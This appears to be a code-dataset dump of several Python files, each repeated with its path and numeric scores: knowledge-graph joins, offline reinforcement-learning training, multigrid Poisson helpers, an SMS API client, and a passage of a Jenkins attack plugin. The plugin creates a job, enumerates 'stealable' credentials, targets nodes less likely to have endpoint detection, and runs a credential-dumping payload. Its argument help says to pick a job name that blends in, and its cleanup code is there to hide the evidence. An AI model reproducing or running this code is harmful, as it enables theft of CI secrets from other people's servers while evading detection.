@param relation1: first relation to derive facts (each key maps to a idx_sub and idx_obj)
@param relation2: second relation to derive facts (each key maps to a idx_sub and idx_obj)
@return: the resulting relation (also behind a context layer), the number of results
"""
results_s_merged = {}
for c in context:
# context must be included in both relations
if c not in relation1 or c not in relation2:
continue
idx_s = relation2[c]["idx_subject"]
idx_o = relation1[c]["idx_object"]
c_results, c_result_len = kg_derive_facts(idx_s, idx_o)
results_s_merged = merge_2_into_1(results_s_merged, c_results)
return results_s_merged, count_val_size_in_dict(results_s_merged)
def derive_facts_ddi_function(context, relation1, relation2):
"""
derives facts for the ddi function experiment (the temporary join table must be kept in between)
@param context: the context index stores a set of key sas the contexts
@param relation1: first relation to derive facts (each key maps to a idx_sub and idx_obj)
@param relation2: second relation to derive facts (each key maps to a idx_sub and idx_obj)
@return: the resulting relation (also behind a context layer), the number of results
"""
results_s_merged = {}
for c in context:
# context must be included in both relations
if c not in relation1 or c not in relation2:
continue
idx_s = relation2[c]["idx_subject"]
idx_o = relation1[c]["idx_object"]
_, ddi_f_t1_df_o, t1_len = kg_derive_facts(idx_s, idx_o, compute_o_idx=True)
# drug is in both cases the object
ddi_f_res, ddi_f_res_len = kg_derive_facts(ddi_f_t1_df_o, ddi_f_t1_df_o)
results_s_merged = merge_2_into_1(results_s_merged, ddi_f_res)
return results_s_merged, count_val_size_in_dict(results_s_merged) | model/librarygraph.py | from model.knowledgegraph import kg_derive_facts
def load_lg_facts(conn, query):
"""
loads triple-based facts from a SemMedDB and builds the corresponding idx_pmid
idx_pmid stores a idx_subject and a idx_object for each pmid from the query result
the indices store which (subject -> [object1, ..., objectn] and which object -> [sub1, ..., subn]
@param conn: SemMedDB connection handle
@param query: the query which retrieves facts from the database (must project pmid, subj and obj)
@return: the idx_pmid (which stores a idx_subject and idx_object behind each pmid)
"""
cur = conn.cursor()
cur.execute(query)
rows = cur.fetchall()
idx_pmid = {}
for r in rows:
pmid, sub, obj = str(r[0]), str(r[1]), str(r[2])
if pmid not in idx_pmid:
idx_s = {}
idx_o = {}
idx_pmid[pmid] = {"idx_subject": idx_s, "idx_object": idx_o}
else:
idx_s = idx_pmid[pmid]["idx_subject"]
idx_o = idx_pmid[pmid]["idx_object"]
if sub not in idx_s:
idx_s[sub] = set()
idx_s[sub].add(obj)
if obj not in idx_o:
idx_o[obj] = set()
idx_o[obj].add(sub)
return idx_pmid
def merge_2_into_1(res1, res2):
"""
merges 2 dictionaries together
the second dictionary is merged in the first one (the second remains unchanged / is copied)
@param res1: a dictionary in which the second dict will be merges
@param res2: second dict will remain unchanged
@return: the first dict (in which the second dict is merged)
"""
res = res1
for s, objects in res2.items():
if s not in res:
res[s] = objects.copy()
else:
res[s].update(objects)
return res
def count_val_size_in_dict(result):
"""
expects a dict with keys which map to lists
sums the size of all lists in the dict
@param result: a dict where each key maps to a list
@return: the summed size of all lists
"""
amount = 0
for k, values in result.items():
amount += len(values)
return amount
def derive_facts_with_context(context, relation1, relation2):
"""
derives facts like the kg but limited to contexts
@param context: the context index stores a set of key sas the contexts
@param relation1: first relation to derive facts (each key maps to a idx_sub and idx_obj)
@param relation2: second relation to derive facts (each key maps to a idx_sub and idx_obj)
@return: the resulting relation (also behind a context layer), the number of results
"""
results_s_merged = {}
for c in context:
# context must be included in both relations
if c not in relation1 or c not in relation2:
continue
idx_s = relation2[c]["idx_subject"]
idx_o = relation1[c]["idx_object"]
c_results, c_result_len = kg_derive_facts(idx_s, idx_o)
results_s_merged = merge_2_into_1(results_s_merged, c_results)
return results_s_merged, count_val_size_in_dict(results_s_merged)
def derive_facts_ddi_function(context, relation1, relation2):
"""
derives facts for the ddi function experiment (the temporary join table must be kept in between)
@param context: the context index stores a set of key sas the contexts
@param relation1: first relation to derive facts (each key maps to a idx_sub and idx_obj)
@param relation2: second relation to derive facts (each key maps to a idx_sub and idx_obj)
@return: the resulting relation (also behind a context layer), the number of results
"""
results_s_merged = {}
for c in context:
# context must be included in both relations
if c not in relation1 or c not in relation2:
continue
idx_s = relation2[c]["idx_subject"]
idx_o = relation1[c]["idx_object"]
_, ddi_f_t1_df_o, t1_len = kg_derive_facts(idx_s, idx_o, compute_o_idx=True)
# drug is in both cases the object
ddi_f_res, ddi_f_res_len = kg_derive_facts(ddi_f_t1_df_o, ddi_f_t1_df_o)
results_s_merged = merge_2_into_1(results_s_merged, ddi_f_res)
return results_s_merged, count_val_size_in_dict(results_s_merged) | 0.806929 | 0.500244 |
import argparse
import pickle
import random
from copy import copy
from typing import List
import numpy as np
from hfo import GOAL, IN_GAME, CAPTURED_BY_DEFENSE, OUT_OF_TIME, OUT_OF_BOUNDS
import settings
from agents.utils import ServerDownError, get_vertices_around_ball
from agents.plastic_v1.base.hfo_attacking_player import HFOAttackingPlayer
from agents.plastic_v1.deep_agent import DQNAgent, Transition, MINIBATCH_SIZE
from agents.plastic_v1.actions.simplex import Actions
from agents.plastic_v1.features.plastic_features import PlasticFeatures
from agents.plastic_v1.aux import print_transiction
STARTING_POSITIONS = {"TOP LEFT": (-0.5, -0.7), "TOP RIGHT": (0.4, -0.7),
"MID LEFT": (-0.5, 0.0), "MID RIGHT": (0.4, 0.0),
"BOTTOM LEFT": (-0.5, 0.7), "BOTTOM RIGHT": (0.4, 0.7)}
class Player:
def __init__(self, num_opponents: int, num_teammates: int,
port: int = 6000):
# Game Interface:
self.game_interface = HFOAttackingPlayer(num_opponents=num_opponents,
num_teammates=num_teammates,
port=port)
# Features Interface:
self.features = PlasticFeatures(num_op=num_opponents,
num_team=num_teammates)
# Actions Interface:
self.actions = Actions(num_team=num_teammates, features=self.features,
game_interface=self.game_interface)
# Agent instance:
self.agent = DQNAgent(num_features=self.features.num_features,
num_actions=self.actions.get_num_actions(),
learning_rate=0.005, discount_factor=0.99,
epsilon=1, final_epsilon=0.001,
epsilon_decay=0.99997, tau=0.125)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--num_opponents', type=int, default=0)
parser.add_argument('--num_teammates', type=int, default=0)
parser.add_argument('--dir', type=str, default=None)
# Parse Arguments:
args = parser.parse_args()
num_team = args.num_teammates
num_op = args.num_opponents
directory = args.dir
# Start Player:
player = Player(num_teammates=num_team, num_opponents=num_op)
with open(f"{directory}/learn_buffer", "rb") as fp: # Unpickling
train_data = pickle.load(fp)
print(f"TRAIN DATA len={len(train_data)} from {directory};\n"
f"{train_data[0]}")
losses = []
for i in range(20):
# Get a minibatch of random samples from memory replay table
loss = player.agent.fit_batch(train_data, verbose=1)
player.agent.target_model.set_weights(player.agent.model.get_weights())
# Loss:
avr_loss = sum(loss) / len(loss)
print(f"{i}: Avarage loss {avr_loss}")
losses.append(avr_loss)
player.agent.save_model(file_name=directory + "/agent_model")
print("\n!!!!!!!!! AGENT EXIT !!!!!!!!!!!!\n\n") | agents/plastic_v1/train_offline.py | import argparse
import pickle
import random
from copy import copy
from typing import List
import numpy as np
from hfo import GOAL, IN_GAME, CAPTURED_BY_DEFENSE, OUT_OF_TIME, OUT_OF_BOUNDS
import settings
from agents.utils import ServerDownError, get_vertices_around_ball
from agents.plastic_v1.base.hfo_attacking_player import HFOAttackingPlayer
from agents.plastic_v1.deep_agent import DQNAgent, Transition, MINIBATCH_SIZE
from agents.plastic_v1.actions.simplex import Actions
from agents.plastic_v1.features.plastic_features import PlasticFeatures
from agents.plastic_v1.aux import print_transiction
STARTING_POSITIONS = {"TOP LEFT": (-0.5, -0.7), "TOP RIGHT": (0.4, -0.7),
"MID LEFT": (-0.5, 0.0), "MID RIGHT": (0.4, 0.0),
"BOTTOM LEFT": (-0.5, 0.7), "BOTTOM RIGHT": (0.4, 0.7)}
class Player:
def __init__(self, num_opponents: int, num_teammates: int,
port: int = 6000):
# Game Interface:
self.game_interface = HFOAttackingPlayer(num_opponents=num_opponents,
num_teammates=num_teammates,
port=port)
# Features Interface:
self.features = PlasticFeatures(num_op=num_opponents,
num_team=num_teammates)
# Actions Interface:
self.actions = Actions(num_team=num_teammates, features=self.features,
game_interface=self.game_interface)
# Agent instance:
self.agent = DQNAgent(num_features=self.features.num_features,
num_actions=self.actions.get_num_actions(),
learning_rate=0.005, discount_factor=0.99,
epsilon=1, final_epsilon=0.001,
epsilon_decay=0.99997, tau=0.125)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--num_opponents', type=int, default=0)
parser.add_argument('--num_teammates', type=int, default=0)
parser.add_argument('--dir', type=str, default=None)
# Parse Arguments:
args = parser.parse_args()
num_team = args.num_teammates
num_op = args.num_opponents
directory = args.dir
# Start Player:
player = Player(num_teammates=num_team, num_opponents=num_op)
with open(f"{directory}/learn_buffer", "rb") as fp: # Unpickling
train_data = pickle.load(fp)
print(f"TRAIN DATA len={len(train_data)} from {directory};\n"
f"{train_data[0]}")
losses = []
for i in range(20):
# Get a minibatch of random samples from memory replay table
loss = player.agent.fit_batch(train_data, verbose=1)
player.agent.target_model.set_weights(player.agent.model.get_weights())
# Loss:
avr_loss = sum(loss) / len(loss)
print(f"{i}: Avarage loss {avr_loss}")
losses.append(avr_loss)
player.agent.save_model(file_name=directory + "/agent_model")
print("\n!!!!!!!!! AGENT EXIT !!!!!!!!!!!!\n\n") | 0.605333 | 0.134435 |
import numpy
from numba import autojit
@autojit(nopython=True)
def poisson1d_GS_SingleItr(nx, dx, p, b):
'''
Gauss-Seidel method for 1D Poisson eq. with Dirichlet BCs at both
ends. Only a single iteration is executed. **blitz** is used.
Parameters:
----------
nx: int, number of grid points in x direction
dx: float, grid spacing in x
p: 1D array of float, approximated soln. in last iteration
b: 1D array of float, 0th-order derivative term in Poisson eq.
Returns:
-------
p: 1D array of float, approximated soln. in current iteration
'''
for i in range(1,len(p)-1):
p[i] = 0.5 * (p[i+1] + p[i-1] - dx**2 * b[i])
return p
def RMS(p):
'''
Return the root mean square of p.
Parameters:
----------
p: array
Returns:
-------
Root mean square of p
'''
return numpy.sqrt(numpy.sum(p**2) / p.size)
def residual(dx, pn, b, r):
'''
Calculate the residual for the 1D Poisson equation.
Parameters:
----------
pn: 1D array, approximated solution at a certain iteration n
b: 1D array, the b(x) in the Poisson eq.
Return:
----------
The residual r
'''
# r[0] = 0
r[1:-1] = b[1:-1] - (pn[:-2] - 2 * pn[1:-1] + pn[2:]) / dx**2
# r[-1] = 0
return r
def full_weighting_1d(vF, vC):
'''
Transfer a vector on a fine grid to a coarse grid with full weighting
. The number of elements (not points) of the coarse grid is
half of that of the fine grid.
Parameters:
----------
vF: 1D numpy array, the vector on the fine grid
vC: 1D numpy array, the vector on the coarse grid,
size(vC) = (size(vF) + 1) / 2
Output: vC
'''
vC[0] = vF[0]
vC[1:-1] = 0.25 * (vF[1:-3:2] + 2. * vF[2:-2:2] + vF[3:-1:2])
vC[-1] = vF[-1]
return vC
def interpolation_1d(vC, vF):
'''
Transfer a vector on a coarse grid to a fine grid by linear
interpolation. The number of elements (not points) of the coarse
grid is a half of that of the fine grid.
Parameters:
----------
vC: 1D numpy array, the vector on the coarse grid,
vF: 1D numpy array, the vector on the fine grid
size(vF) = size(vC) * 2 - 1
Output: vF
'''
vF[::2] = vC[:];
vF[1:-1:2] = 0.5 * (vC[:-1] + vC[1:])
return vF | lessons/05_relax/multigrid_helper.py | import numpy
from numba import autojit
@autojit(nopython=True)
def poisson1d_GS_SingleItr(nx, dx, p, b):
'''
Gauss-Seidel method for 1D Poisson eq. with Dirichlet BCs at both
ends. Only a single iteration is executed. **blitz** is used.
Parameters:
----------
nx: int, number of grid points in x direction
dx: float, grid spacing in x
p: 1D array of float, approximated soln. in last iteration
b: 1D array of float, 0th-order derivative term in Poisson eq.
Returns:
-------
p: 1D array of float, approximated soln. in current iteration
'''
for i in range(1,len(p)-1):
p[i] = 0.5 * (p[i+1] + p[i-1] - dx**2 * b[i])
return p
def RMS(p):
'''
Return the root mean square of p.
Parameters:
----------
p: array
Returns:
-------
Root mean square of p
'''
return numpy.sqrt(numpy.sum(p**2) / p.size)
def residual(dx, pn, b, r):
'''
Calculate the residual for the 1D Poisson equation.
Parameters:
----------
pn: 1D array, approximated solution at a certain iteration n
b: 1D array, the b(x) in the Poisson eq.
Return:
----------
The residual r
'''
# r[0] = 0
r[1:-1] = b[1:-1] - (pn[:-2] - 2 * pn[1:-1] + pn[2:]) / dx**2
# r[-1] = 0
return r
def full_weighting_1d(vF, vC):
'''
Transfer a vector on a fine grid to a coarse grid with full weighting
. The number of elements (not points) of the coarse grid is
half of that of the fine grid.
Parameters:
----------
vF: 1D numpy array, the vector on the fine grid
vC: 1D numpy array, the vector on the coarse grid,
size(vC) = (size(vF) + 1) / 2
Output: vC
'''
vC[0] = vF[0]
vC[1:-1] = 0.25 * (vF[1:-3:2] + 2. * vF[2:-2:2] + vF[3:-1:2])
vC[-1] = vF[-1]
return vC
def interpolation_1d(vC, vF):
'''
Transfer a vector on a coarse grid to a fine grid by linear
interpolation. The number of elements (not points) of the coarse
grid is a half of that of the fine grid.
Parameters:
----------
vC: 1D numpy array, the vector on the coarse grid,
vF: 1D numpy array, the vector on the fine grid
size(vF) = size(vC) * 2 - 1
Output: vF
'''
vF[::2] = vC[:];
vF[1:-1:2] = 0.5 * (vC[:-1] + vC[1:])
return vF | 0.84869 | 0.749294 |
import requests
import logging
class kotsms:
def __init__(self):
self.API_URL = "https://api2.kotsms.com.tw/kotsmsapi-2.php"
self.API_POINT_URL = "https://api.kotsms.com.tw/memberpoint.php"
def login(self, username, passwd):
self.USERNAME = username
self.PASSWORD = <PASSWORD>
def sendMsg(self, phone, sms):
self.smslen = len(sms)
self.PHONE = phone
self.SMS = sms
data = {
"username" : self.USERNAME,
"password" : self.PASSWORD,
"dstaddr" : phone,
"smbody" : sms.encode("big5"),
"dlvtime" : 0
}
response = requests.get(self.API_URL, params=data)
points = requests.get(self.API_POINT_URL, params={"username" : self.USERNAME, "password" : self.PASSWORD})
self.points = int(points.text)
return self.responseDecoder(response.text)
def responseDecoder(self, res):
code = res.split("=")[1].split("\n")[0]
errorMsg = {
"-1" : "CGI string error ,系統維護中或其他錯誤 ,帶入的參數異常,伺服器異常",
"-2" : "授權錯誤(帳號/密碼錯誤)",
"-4" : "A Number違反規則 發送端 870短碼VCSN 設定異常",
"-5" : "B Number違反規則 接收端 門號錯誤 ",
"-6" : "Closed User 接收端的門號停話異常090 094 099 付費代號等",
"-20" : "Schedule Time錯誤 預約時間錯誤 或時間已過",
"-21" : "Valid Time錯誤 有效時間錯誤",
"-1000" : "發送內容違反NCC規範",
"-59999" : "帳務系統異常 簡訊無法扣款送出",
"-60002" : "您帳戶中的點數不足",
"-60014" : "該用戶已申請 拒收簡訊平台之簡訊 ( 2010 NCC新規)",
"-999959999" : "在12 小時內,相同容錯機制碼",
"-999969999" : "同秒, 同門號, 同內容簡訊",
"-999979999" : "鎖定來源IP",
"-999989999" : "簡訊為空"
}
if(int(code) < 0):
msg = u"[錯誤] {} : 點數剩餘 {} : {}".format(code, self.points, errorMsg[code].decode('utf-8'))
print(msg)
logging.error(msg)
else:
msg = u"[成功] {} : 點數剩餘 {} : 發送至 {} 傳送成功,簡訊長度為 {} 字, 內容為 : 「{}」 。".format(code, self.points, self.PHONE, self.smslen, self.SMS)
print(msg)
logging.info(msg)
return code | kotsms.py | import requests
import logging
class kotsms:
def __init__(self):
self.API_URL = "https://api2.kotsms.com.tw/kotsmsapi-2.php"
self.API_POINT_URL = "https://api.kotsms.com.tw/memberpoint.php"
def login(self, username, passwd):
self.USERNAME = username
self.PASSWORD = <PASSWORD>
def sendMsg(self, phone, sms):
self.smslen = len(sms)
self.PHONE = phone
self.SMS = sms
data = {
"username" : self.USERNAME,
"password" : self.PASSWORD,
"dstaddr" : phone,
"smbody" : sms.encode("big5"),
"dlvtime" : 0
}
response = requests.get(self.API_URL, params=data)
points = requests.get(self.API_POINT_URL, params={"username" : self.USERNAME, "password" : self.PASSWORD})
self.points = int(points.text)
return self.responseDecoder(response.text)
def responseDecoder(self, res):
code = res.split("=")[1].split("\n")[0]
errorMsg = {
"-1" : "CGI string error ,系統維護中或其他錯誤 ,帶入的參數異常,伺服器異常",
"-2" : "授權錯誤(帳號/密碼錯誤)",
"-4" : "A Number違反規則 發送端 870短碼VCSN 設定異常",
"-5" : "B Number違反規則 接收端 門號錯誤 ",
"-6" : "Closed User 接收端的門號停話異常090 094 099 付費代號等",
"-20" : "Schedule Time錯誤 預約時間錯誤 或時間已過",
"-21" : "Valid Time錯誤 有效時間錯誤",
"-1000" : "發送內容違反NCC規範",
"-59999" : "帳務系統異常 簡訊無法扣款送出",
"-60002" : "您帳戶中的點數不足",
"-60014" : "該用戶已申請 拒收簡訊平台之簡訊 ( 2010 NCC新規)",
"-999959999" : "在12 小時內,相同容錯機制碼",
"-999969999" : "同秒, 同門號, 同內容簡訊",
"-999979999" : "鎖定來源IP",
"-999989999" : "簡訊為空"
}
if(int(code) < 0):
msg = u"[錯誤] {} : 點數剩餘 {} : {}".format(code, self.points, errorMsg[code].decode('utf-8'))
print(msg)
logging.error(msg)
else:
msg = u"[成功] {} : 點數剩餘 {} : 發送至 {} 傳送成功,簡訊長度為 {} 字, 內容為 : 「{}」 。".format(code, self.points, self.PHONE, self.smslen, self.SMS)
print(msg)
logging.info(msg)
return code | 0.283285 | 0.147187 |
import base64
import os
import random
import re
import string
import time
import xml.sax.saxutils
import requests.exceptions as req_exc
from libs import jenkinslib, quik
from .BasePlugin import BasePlugin, HijackStdOut
class NonCriticalException(Exception):
pass
def xmlescape(data):
return xml.sax.saxutils.escape(data, {'"': """})
class DumpCredsViaJob(BasePlugin):
"""Class for managing DumpCredsViaJob SubCommand"""
template_cache = None
def __init__(self, args):
super().__init__(args)
state = 1
try:
cred = self.args.credentials[0]
server = self._get_jenkins_server(cred)
if not server.can_create_job():
self.logging.fatal(
"%s: Is not a valid Jenkins user with job creation access or unable to access Jenkins server.",
self._get_username(cred),
)
return
# Step 1: Create empty job so we can check permissions and then use it to list available credentials
server.create_job(
self.args.task_name, "<?xml version='1.1' encoding='UTF-8'?><project></project>"
)
state += 1
# Step 2: Use new job to get list of stealable credentials
credential_list = [x for x in server.list_credentials(self.args.task_name) if x["type"]]
if len(credential_list) == 0:
raise NonCriticalException("No credentials were discovered.")
state += 1
# Step 3: Get a list of online jenkins nodes
posix_nodes = []
windows_nodes = []
other_nodes = []
if self.args.node:
if self.args.node_type == "posix":
posix_nodes = [{"name": self.args.node}]
else:
windows_nodes = [{"name": self.args.node}]
else:
nodes = [x for x in server.get_nodes() if not x["offline"]]
if len(nodes) == 0:
raise NonCriticalException("No online nodes were discovered.")
"""
We need to try to divide nodes up by type because our payload will change.
If unknown, chances are it is some flavor of POSIX compatible OS with base64, echo, and cat, so we can
attempt POSIX payload as a last resort if nothing else is available. Also, for some reason master is
not shown on the nodes page so we can't get the architecture. In most cases the master will be posix compliant anyway.
In most cases, if execution on the master is denied, that means there will be more than one slave.
"""
for node in nodes:
if node["architecture"] and "windows" in node["architecture"].lower():
windows_nodes.append(node)
elif (
any(
node["architecture"] and x in node["architecture"].lower()
for x in ["nix", "nux", "bsd", "osx"]
)
or node["name"] == "master"
):
posix_nodes.append(node)
else:
other_nodes.append(node)
state += 1
"""
Step 4: We determine where we are going to try to run this payload and fabricate the payload.
We want to prioritize posix due to less chance of EDR, and more efficient payload design.
We want to pick our execution location in this order posix -> windows -> other.
"""
barrier = "##{}##".format(
"".join(random.choices(string.ascii_letters + string.digits, k=64))
)
job = None
job_type = None
run_nodes = None
if len(posix_nodes) > 0:
job_type = "posix"
run_nodes = posix_nodes
elif len(windows_nodes) > 0:
job_type = "windows"
run_nodes = windows_nodes
elif len(other_nodes) > 0:
job_type = "posix"
run_nodes = other_nodes
else:
raise NonCriticalException("No nodes to execute on.")
job = self._generate_job_xml(job_type, run_nodes, barrier, credential_list)
state += 1
"""
Step 5: Reconfigure the job payload with actual credential dumping
"""
server.reconfig_job(self.args.task_name, job)
state += 1
"""
Step 6: Start the job
"""
server.build_job(self.args.task_name)
"""
Step 7: Wait for the Results
"""
while True:
time.sleep(3)
try:
results = server.get_build_info(self.args.task_name, "lastBuild")
break
except jenkinslib.JenkinsException:
pass
while results["building"]:
time.sleep(3)
results = server.get_build_info(self.args.task_name, "lastBuild")
if results["result"] != "SUCCESS":
raise NonCriticalException(
"Credential Dumping Build did not complete successfully."
)
state += 1
"""
Step 8: Retrieve Credentials
"""
result = server.get_build_console_output(
"job/" + self.args.task_name + "/", "lastBuild"
)
state += 1
"""
Step 9: Parse Results
"""
# Normalize extract base64 encoded credentials:
try:
result = "\n".join(x for x in result.split("\n") if not x.startswith("+ "))
result = (
re.findall(
r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----",
result,
re.M | re.S,
)[0]
.replace("\r", "")
.replace("\n", "")
)
result = base64.b64decode(result).decode("utf8")
except Exception:
raise NonCriticalException("Unable to parse out credentials from job.")
result = re.split(re.escape(barrier), result, re.M)[1:]
for i, raw_cred in enumerate(result):
raw_cred = raw_cred.replace("\r", "\n").replace("\n\n", "\n")
raw_cred = re.split(r"[\r\n]", raw_cred, re.M)[1:]
try:
if raw_cred[0].strip() == "PASSWORD":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
username = raw_cred[2].split(":")[0].strip()
password = ":".join(raw_cred[2].split(":")[1:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Username:", username)
print("Password:", password)
elif raw_cred[0].strip() == "SSHKEY":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
username = raw_cred[2].strip()
passphrase = raw_cred[3].strip()
key = "\n".join(raw_cred[4:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Username:", username)
print("Passphrase:", passphrase)
print("Key:")
print(key)
elif raw_cred[0].strip() == "SECRETTEXT":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
text = raw_cred[2].strip()
print("Type:", cred_type)
print("Description:", description)
print("Text:", text)
elif raw_cred[0].strip() == "SECRETFILE":
if (
raw_cred[2] == ""
): # Delete blank line if it exists at top of file which was introduced by regex splitting
del raw_cred[2]
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
file_content = "\n".join(raw_cred[2:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Content:")
print(file_content)
except Exception:
pass
if i < (len(result) - 1):
print(
"-----------------------------------------------------------------------------"
)
except jenkinslib.JenkinsException as ex:
if "[403]" in str(ex).split("\n")[0]:
self.logging.fatal(
"%s authentication failed or no access", self._get_username(cred)
)
else:
self.logging.fatal(
"Unable to access Jenkins at: %s With User: %s For Reason:\n\t%s"
% (
(
self.server_url.netloc
if len(self.server_url.netloc) > 0
else self.args.server
),
self._get_username(cred),
str(ex).split("\n")[0],
)
)
except (req_exc.SSLError, req_exc.ConnectionError):
self.logging.fatal(
"Unable to connect to: "
+ (self.server_url.netloc if len(self.server_url.netloc) > 0 else self.args.server)
)
except NonCriticalException as ex:
with HijackStdOut():
print(str(ex))
except Exception:
self.logging.exception("")
exit(1)
finally:
# Do Cleanup
if state > 1:
try:
server.delete_job(self.args.task_name)
return
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
with HijackStdOut():
print(
"WARNING: Unable to delete the job, attempting secondary clean-up. You should double check."
)
# We were unable to delete the the task, so we need to do secondary clean-up as best we can:
# First we delete all console output and run history:
try:
server.delete_all_job_builds(self.args.task_name)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to clean-up console output. You should definitely try to do this yourself."
)
# Second, overwrite the job with an empty job:
try:
server.reconfig_job(
self.args.task_name,
"<?xml version='1.1' encoding='UTF-8'?><project></project>",
)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to wipeout job to hide the evidence. You should definitely try to do this yourself."
)
# Third, attempt to disable the job:
try:
server.disable_job(self.args.task_name)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to disable job. You should definitely try to do this yourself."
)
def _generate_job_xml(self, job_type, nodes, barrier, credentials):
file_name = "f" + "".join(random.choices(string.ascii_letters + string.digits, k=8))
loader = quik.FileLoader(os.path.join("data", "xml"))
bindings_template = loader.load_template("credential_binding_template.xml")
job_template = loader.load_template("job_template.xml")
if job_type == "posix":
cmd_template = quik.FileLoader(os.path.join("data", "bash")).load_template(
"posix_job_dump_creds_template.sh"
)
else:
cmd_template = quik.FileLoader(os.path.join("data", "batch")).load_template(
"windows_job_dump_creds_template.bat"
)
for i in range(len(credentials)):
if credentials[i]["type"] == "SSHKEY":
credentials[i]["key_file_variable"] = "a{0}k".format(i)
credentials[i]["username_variable"] = "a{0}u".format(i)
credentials[i]["passphrase_variable"] = "a{0}p".format(i)
else: # For now everything else uses only one variable
credentials[i]["variable"] = "a{0}".format(i)
bindings = bindings_template.render(locals())
cmds = cmd_template.render(locals())
return job_template.render(
{
"job_type": "BatchFile" if job_type == "windows" else "Shell",
"assigned_nodes": "({})".format(
xmlescape(" || ".join(['"{}"'.format(x["name"]) for x in nodes]))
),
"commands": xmlescape(cmds),
"credential_bindings": bindings,
}
)
class DumpCredsViaJobParser:
def cmd_DumpCredsViaJob(self):
"""Handles parsing of RunCommand Subcommand arguments"""
self._create_contextual_parser(
"DumpCredsViaJob",
"Dump credentials via explicit enumeration of shared credentials in a job (Only requires job creation permissions and some shared credentials)",
)
self._add_common_arg_parsers()
self.parser.add_argument(
"-N",
"--node",
metavar="<Node>",
help="Node to execute against. If specified, you must also pass -T",
action="store",
dest="node",
required=False,
)
self.parser.add_argument(
"-T",
"--nodetype",
metavar="<Node Type>",
help='Node Type, either: "posix" or "windows". If specified, you must also pass -N',
choices=["posix", "windows"],
dest="node_type",
required=False,
)
self.parser.add_argument(
metavar="<Task Name>",
help="Task to Create, must be unique (may not be deleted if user doesn't have job deletion permissions, so pick something that blends in)",
action="store",
dest="task_name",
)
args = self.parser.parse_args()
self._validate_server_url(args)
self._validate_output_file(args)
if not args.task_name or any(
x not in (string.ascii_letters + string.digits + "/") for x in args.task_name
):
with HijackStdOut():
self.parser.print_usage()
print(
"\nError: Task Name must be alphanumeric string with optional subfolder pathing via forward slashes."
)
exit(1)
if (args.node and not args.node_type) or (args.node_type and not args.node):
with HijackStdOut():
self.parser.print_usage()
print("\nError: You must either specify both Node and Node Type or neither")
exit(1)
return self._handle_authentication(args) | libs/JAF/plugin_DumpCredsViaJob.py | import base64
import os
import random
import re
import string
import time
import xml.sax.saxutils
import requests.exceptions as req_exc
from libs import jenkinslib, quik
from .BasePlugin import BasePlugin, HijackStdOut
class NonCriticalException(Exception):
pass
def xmlescape(data):
return xml.sax.saxutils.escape(data, {'"': """})
class DumpCredsViaJob(BasePlugin):
"""Class for managing DumpCredsViaJob SubCommand"""
template_cache = None
def __init__(self, args):
super().__init__(args)
state = 1
try:
cred = self.args.credentials[0]
server = self._get_jenkins_server(cred)
if not server.can_create_job():
self.logging.fatal(
"%s: Is not a valid Jenkins user with job creation access or unable to access Jenkins server.",
self._get_username(cred),
)
return
# Step 1: Create empty job so we can check permissions and then use it to list available credentials
server.create_job(
self.args.task_name, "<?xml version='1.1' encoding='UTF-8'?><project></project>"
)
state += 1
# Step 2: Use new job to get list of stealable credentials
credential_list = [x for x in server.list_credentials(self.args.task_name) if x["type"]]
if len(credential_list) == 0:
raise NonCriticalException("No credentials were discovered.")
state += 1
# Step 3: Get a list of online jenkins nodes
posix_nodes = []
windows_nodes = []
other_nodes = []
if self.args.node:
if self.args.node_type == "posix":
posix_nodes = [{"name": self.args.node}]
else:
windows_nodes = [{"name": self.args.node}]
else:
nodes = [x for x in server.get_nodes() if not x["offline"]]
if len(nodes) == 0:
raise NonCriticalException("No online nodes were discovered.")
"""
We need to try to divide nodes up by type because our payload will change.
If unknown, chances are it is some flavor of POSIX compatible OS with base64, echo, and cat, so we can
attempt POSIX payload as a last resort if nothing else is available. Also, for some reason master is
not shown on the nodes page so we can't get the architecture. In most cases the master will be posix compliant anyway.
In most cases, if execution on the master is denied, that means there will be more than one slave.
"""
for node in nodes:
if node["architecture"] and "windows" in node["architecture"].lower():
windows_nodes.append(node)
elif (
any(
node["architecture"] and x in node["architecture"].lower()
for x in ["nix", "nux", "bsd", "osx"]
)
or node["name"] == "master"
):
posix_nodes.append(node)
else:
other_nodes.append(node)
state += 1
"""
Step 4: We determine where we are going to try to run this payload and fabricate the payload.
We want to prioritize posix due to less chance of EDR, and more efficient payload design.
We want to pick our execution location in this order posix -> windows -> other.
"""
barrier = "##{}##".format(
"".join(random.choices(string.ascii_letters + string.digits, k=64))
)
job = None
job_type = None
run_nodes = None
if len(posix_nodes) > 0:
job_type = "posix"
run_nodes = posix_nodes
elif len(windows_nodes) > 0:
job_type = "windows"
run_nodes = windows_nodes
elif len(other_nodes) > 0:
job_type = "posix"
run_nodes = other_nodes
else:
raise NonCriticalException("No nodes to execute on.")
job = self._generate_job_xml(job_type, run_nodes, barrier, credential_list)
state += 1
"""
Step 5: Reconfigure the job payload with actual credential dumping
"""
server.reconfig_job(self.args.task_name, job)
state += 1
"""
Step 6: Start the job
"""
server.build_job(self.args.task_name)
"""
Step 7: Wait for the Results
"""
while True:
time.sleep(3)
try:
results = server.get_build_info(self.args.task_name, "lastBuild")
break
except jenkinslib.JenkinsException:
pass
while results["building"]:
time.sleep(3)
results = server.get_build_info(self.args.task_name, "lastBuild")
if results["result"] != "SUCCESS":
raise NonCriticalException(
"Credential Dumping Build did not complete successfully."
)
state += 1
"""
Step 8: Retrieve Credentials
"""
result = server.get_build_console_output(
